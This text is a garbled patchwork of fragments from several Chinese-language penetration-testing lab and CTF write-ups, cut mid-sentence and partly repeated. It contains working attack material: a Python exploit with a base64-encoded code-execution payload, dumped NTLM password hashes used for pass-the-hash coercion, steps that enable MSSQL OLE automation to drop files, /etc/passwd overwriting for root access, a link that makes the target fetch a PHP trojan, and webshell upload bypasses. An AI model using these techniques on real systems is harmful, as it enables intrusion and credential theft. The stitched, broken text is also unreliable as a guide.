mysql',| ||'prefix' => '',| 根据之前的信息发现只开启了80端口,是否22端口存在打开方式,去看看/etc/knockd.conf文件,果然需要敲5004,4284,6872这3个类似
但是发现目前的权限不支持上传文件 python3 -m http.server 8833 (用于开启web服务,注意用完记得及时关掉免得信息被泄露) 所以准备从系统自带的一些命令来下手提权 先尝试了收 :fe0b:bb8b prefixlen 64 scopeid 0x20<link> ether 00:16:3e:0b:bb:8b txqueuelen 1000 (Ethernet bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3: ⼀般打靶场这种后续都可以利⽤到。 CVE-2019-1130 : VULNERABLE [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear [!]
然后rubeus就收到了来自dc的TGTpython dfscoerce.py -u WIN19 -hashes :a91969d7ad569d8591027fa9d707b3ad -d xiaorang.lab
is plain text | Data connections will be plain text | At session startup, client count was 3 anonymous采用匿名登录 默认是ASCII模式,输入binary切换为二进制模式 get cred.txt welcome将ftp文件获取到本地 打开cred.txt获取文件内容Y2hhbXA6cGFzc3dvcmQ 加密,根据提示逆序后解密得到wtf:this one is a simple one 尝试过登录SSH:ssh wtf@192.18.128.1 -p 55077,sudo -l查看当前用户权限,发现是3a
今天要挑战的是htb的SolarLab靶场 首先使用nmap进行扫描 访问80端口得到3个用户 然后继续访问发现有框,进行了xss、注入操作无果 然后有一个登录页面,弱口令尝试无果 然后通过smb扫描发现了一个共享文档 /usr/bin/python3 import argparse import requests from sys import exit from base64 import b64decode import ") # Base64 Encoded Post Template base = b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t ") exploit_base = b64decode("PHA+PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4
附件上传设置把zip,rar后缀添加白名单使得构造的自解压压缩包能上传上去 shell路径:/SiteFiles/SiteTemplates/压缩包名/shell名.aspx 2.3 getshell-3 数据库 发现sa账号密码字段拿去解密付费后得到明文为QwE123asd,尝试sa用户利用MDUT登陆数据库,可以使用certutil编码转exe文件实现落地,这里尝试sp_oacreate组件落地 3. No3 3.1 文件落地 启用OLE组件: exec master.dbo.sp_configure 'show advanced options', 1 RECONFIGURE exec master.dbo.sp_configure
$i ; done 存活IP有 172.17.0.1-3 接下来可以传个代理工具去访问其他机器了。 起初我想用ew去做代理,但是发现目标环境似乎不支持ew运行,遂使用venom。
m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnBocA== link位置是base64编码的地址 然后正常访问到下载的木马文件
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录 user_id=1 and (select IS_SRVROLEMEMBER('sysadmin')%3E0-- user_id=1;declare @f int,@g int; exec sp_oacreate xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;
443端口开放的是一个Zimbra的系统: 使用指纹探测,好像就这两个端口开放了web服务: 发现开放了ssh,使用常用的字典进行爆破,没有发现弱口令: 通过google可以搜索到一些历史漏洞: 3. 下载的提权脚本提取的时候会有问题 3、做隧道要使用frp,msf不稳,很容易掉 4、上面我用到了yakit,里面也带了端口扫描的功能,当时我偷懒还没用frp直接上传的fscan
附件上传设置把zip,rar后缀添加白名单使得构造的自解压压缩包能上传上去 shell路径:/SiteFiles/SiteTemplates/压缩包名/shell名.aspx 2.3 getshell-3 数据库 发现sa账号密码字段拿去解密付费后得到明文为QwE123asd,尝试sa用户利用MDUT登陆数据库,可以使用certutil编码转exe文件实现落地,这里尝试sp_oacreate组件落地 3. No3 3.1 文件落地 启用OLE组件: exec master.dbo.sp_configure 'show advanced options', 1 RECONFIGURE exec master.dbo.sp_configure
209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8 wdigest credentials === 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f 27 ba 60 3b 91 d5 fa 53 fc 5b 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f OK Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15::: Guest:501:aad3b435b51404eeaad3b435b51404ee WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee
通过命令注入漏洞,进行命令注入 3. 使用hydra对ssh进行爆破 4. 通过现有的脚本进行提权操作 -END-
可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题
var erp = new Array;erp[0] = 1008813135;erp[1] = 1129601360;erp[2] = 1159751796;erp[3] = 1835810317;erp ;var em = '';for(i=0;i<erp.length;i++){ tmp = erp[i]; if(Math.floor((tmp/Math.pow(256,3) ))>0){ em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3)))); }; tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) \* Math.pow(256,3)); if(Math.floor((tmp/Math.pow 3), done.
在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方
> ③ - 说明 确认webshell上传成功的演示只在Pass01[3]演示一遍 本题使用的webshell均为最简单的phpinfo(),一句话木马getshell会在Pass02[4]演示一遍 ,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 - 详解upload-labs靶场(下) 第三步:上传后,访问webshell 第四步:使用蚁剑进行getshell 出现2操作说明webshell能够连接,接下来可以测试命令的执行 执行成功,可以进行getshell 0vk90 iica3 ]配置 第一步:上传后缀名为.phtml(根据配置尝试)的webshell 第二步:确认webshell是否上传成功 dtbl1 ctxtv 【Pass04 - 利用.htaccess绕过】 题目: 3d0mx 的文件名,并以0x00结束即可实现绕过 第一步:修改webshell的后缀为白名单内的后缀并上传 第二步:抓包,然后修改POST中的路径值 第二步的详细步骤: 修改完成后发包 eyz8z gwvo1 l3uej
前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 3. 目录扫描 通过dirb扫描整个文章,看是否可以有利用的信息。 dirb http://192.168.202.125/。 但是并没有扫描出理想文件目录出来。 4. 输入 mysql -udbuser -pR0ck3t #连接数据库 输入 show databases; #查看数据库 use drupaldb; #选择数据库 show tables 页面操作 在逛页面的时候我们看到了flag3 ? 打开看看写了什么 ? 根据提示告诉我们可以去看下密码文件 进入msf会话中,去看下/etc/passwd文件 ? 3.掌握MSF的使用方法,通过MSF框架进行对靶机项目的漏洞利用。 4.必须掌握数据库操作,查询库,表,数据,修改,添加等操作。
下载地址 百度云链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p 其中vulntarget-c是本次环境 github地址: https 网络配置 2.1 网关配置 2.2 win2016 win2016测试连通性 修改ubuntu 20 2.3 ubuntu20 ubuntu 20测试连通性 3. 打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/ phpggc/zip/refs/heads/master exp:https://github.com/crisprss/Laravel_CVE-2021-3129_EXP 使用方法就是使用python3 的默认路径 /var/www/html,看到了存在laravel的压缩包 直接看到public下的入口文件index.php 本来想在这里写入一句话木马,先把index.php备份了一下 python3